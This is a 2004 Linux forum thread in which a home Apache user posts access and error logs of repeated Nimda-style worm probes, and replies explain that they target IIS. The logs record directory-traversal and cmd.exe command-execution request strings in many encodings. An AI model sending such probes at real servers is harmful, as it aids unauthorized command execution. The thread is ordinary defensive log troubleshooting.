LinuxQuestions.org
Review your favorite Linux distribution.
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Software
User Name
Password
Linux - Software This forum is for Software issues.
Having a problem installing a new program? Want to know which application is best for the job? Post your question in this forum.

Notices


Reply
  Search this Thread
Old 07-31-2004, 03:06 AM   #1
apc
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Rep: Reputation: 0
Random exe requests to apache


I'm running apache just so I can have a simple little website hosted from my computer for my family and friends. Tonight I came home to the following in my logs:

In access_log:
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:44 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:46 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:48 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:52 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:54 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:56 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:58 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:00 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:02 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:04 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:06 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:08 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:10 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:12 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:13 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467

and in error_log:

[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/root.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/MSADC/root.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/c/winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/d/winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..\xc0\xaf../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..\xc1\x9c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..%2f../winnt/system32/cmd.exe
[Fri Jul 30 23:36:44 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/root.exe
[Fri Jul 30 23:36:46 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/MSADC/root.exe
[Fri Jul 30 23:36:48 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/c/winnt/system32/cmd.exe
[Fri Jul 30 23:36:52 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/d/winnt/system32/cmd.exe
[Fri Jul 30 23:36:54 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:36:56 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:36:58 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:00 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:02 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:06 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..\xc0\xaf../winnt/system32/cmd.exe
[Fri Jul 30 23:37:08 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..\xc1\x9c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:13 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:15 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..%2f../winnt/system32/cmd.exe

it would appear to be some windows virus maybe, so hopefully it's nothing to worry about, but i wanted to get some insight from people more knowledgable than myself. also, one thing that concerned me is that there were 16 requests made by each ip but only 13 error messages generated by me
 
Old 07-31-2004, 03:08 AM   #2
SBing
Member
 
Registered: Mar 2004
Posts: 519

Rep: Reputation: 35
You could try searching at google for more info on the subject, these logs are generated by Win32 viruses scanning for other vunerable machines - nothing to worry about.

Just put: root.exe apache

into google and see what you come up with.
 
Old 07-31-2004, 03:19 AM   #3
prissed
LQ Newbie
 
Registered: Jul 2004
Location: McKinney, TX
Distribution: MDK 10/KDE 3.2
Posts: 21

Rep: Reputation: 15
Looks like the Nimda worm, its designed to exploit IIS, but since you're running Apache, you should be okay...well, except for bandwidth, depending on how often you're getting hit.

http://www.f-secure.com/v-descs/nimda.shtml
 
Old 07-31-2004, 08:21 AM   #4
Lleb_KCir
Senior Member
 
Registered: Nov 2003
Location: Orlando FL
Distribution: Debian
Posts: 1,765

Rep: Reputation: 45
http://bleaklow.com/blog/archive/000009.html

from the first google.com serch on the sujestion here. great idea, im going to muddle with this over the weekend to see what i can do to drop those annoying M$ viruses from hitting my servers.
 
Old 07-31-2004, 12:39 PM   #5
Crashed_Again
Senior Member
 
Registered: Dec 2002
Location: Atlantic City, NJ
Distribution: Ubuntu & Arch
Posts: 3,503

Rep: Reputation: 57
Its a lost cause to try and drop these things. My snort log is filled with them and if you ban one IP who is infected three more pop up later. The only comfort we have is knowing that this virus just doesn't work on linux servers.
 
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Apache doesn't respond png requests from a remote host. glitchful Linux - Software 3 09-02-2005 09:58 AM
apache track incoming, outgoing requests real-time dtra Linux - Networking 1 07-18-2005 07:19 AM
Apache, forward requests to a vmware virtual machine Hube Linux - Software 2 09-02-2004 09:58 AM
Mod_Proxy (Apache) won't forward requests bentman78 Linux - Software 1 04-20-2004 08:49 AM
apache not connecting on ssl requests Robert0380 Linux - Software 0 06-08-2003 06:03 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Software

All times are GMT -5. The time now is 10:25 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration